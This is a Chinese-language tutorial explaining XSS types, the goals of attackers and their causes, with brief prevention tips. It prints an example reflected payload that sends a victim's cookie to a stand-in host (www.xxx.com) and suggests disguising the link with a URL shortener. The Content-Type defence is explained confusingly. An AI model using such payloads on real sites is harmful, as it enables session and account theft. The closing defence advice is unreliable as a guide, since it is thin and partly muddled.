web滲透—xss攻擊

XSS攻擊：跨站腳本攻擊(Cross-Site Scripting)，為了不和層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆， 故将跨站腳本攻擊縮寫為XSS。XSS是一種常見的web安全漏洞，它允許攻擊者将惡意代碼植入到提供給其它使用者使用的頁面中。

XSS分類

存儲型XSS：

主要出現在讓使用者輸入資料，供其他浏覽此頁的使用者進行檢視的地方，包括留言、評論、部落格日志和各類表單等。

應用程式從資料庫中查詢資料，在頁面中顯示出來，攻擊者在相關頁面輸入惡意的腳本資料後，使用者浏覽此類頁面時就可能受到攻擊。

這個流程簡單可以描述為:惡意使用者的Html輸入Web程式->進入資料庫->Web程式->使用者浏覽器

反射型XSS：

将腳本代碼加入URL位址的請求參數裡，請求參數進入程式後在頁面直接輸出，使用者點選類似的惡意連結就可能受到攻擊。

基于DOM的xss：

通過修改頁面的DOM節點形成的XSS。也是反射型XSS的一種，因為形成原因比較特别，單獨拎出來。

構造資料方法：

1）在已有的标簽内添加事件

2）閉合原來的标簽，插入新的标簽

XSS目前主要的手段和目的如下：

o盜用cookie，擷取敏感資訊。

o利用植入Flash，通過crossdomain權限設定進一步擷取更高權限；或者利用Java等得到類似的操作。

o利用iframe、frame、XMLHttpRequest或上述Flash等方式，以（被攻擊者）使用者的身份執行一些管理動作， 或執行一些如:發微網誌、加好友、發私信等正常操作，前段時間新浪微網誌就遭遇過一次XSS。

o利用可被攻擊的域受到其他域信任的特點，以受信任來源的身份請求一些平時不允許的操作，如進行不當的投票活動。

在通路量極大的一些頁面上的XSS可以攻擊一些小型網站，實作DDoS攻擊的效果

XSS原理

Web應用未對使用者送出請求的資料做充分的檢查過濾，允許使用者在送出的資料中摻入HTML代碼(最主要的是“>”、“<”)， 并将未經轉義的惡意代碼輸出到第三方使用者的浏覽器解釋執行，是導緻XSS漏洞的産生原因。

以反射性XSS舉例說明XSS的過程，現在有一個網站，根據參數輸出使用者的名稱， 例如通路url：http://127.0.0.1/?name=foobar，就會在浏覽器輸出如下資訊：

1 hello foobar

如果我們傳遞這樣的url：

1 http://127.0.0.1/?name=<script>alert('foobar')</script>

這時你就會發現浏覽器跳出一個彈出框，這說明站點已經存在了XSS漏洞。

那麼惡意使用者是如何盜取Cookie的呢？與上類似，如下這樣的url：

1 http://127.0.0.1/?name=<script>document.location.href='http://www.xxx.com/cookie?'+document.cookie</script>

這樣就可以把目前的cookie發送到指定的站點：www.xxx.com

你也許會說，這樣的URL一看就有問題，怎麼會有人點選？是的，這類的URL會讓人懷疑，但如果使用短網址服務将之縮短 ，你還看得出來麼？攻擊者将縮短過後的url通過某些途徑傳播開來，不明真相的使用者一旦點選了這樣的url， 相應cookie資料就會被發送事先設定好的站點，這樣子就盜得了使用者的cookie資訊， 然後就可以利用Websleuth之類的工具來檢查是否能盜取那個使用者的賬戶。

預防XSS

答案很簡單，堅決不要相信使用者的任何輸入，并過濾掉輸入中的所有特殊字元。這樣就能消滅絕大部分的XSS攻擊。

目前防禦XSS主要有如下幾種方式：

o 過濾特殊字元

避免XSS的方法之一主要是将使用者所提供的内容進行過濾。

o 使用HTTP頭指定類型

1 header.set("Content-Type","text/javascript")

這樣就可以讓浏覽器解析javascript代碼，而不會是html輸出。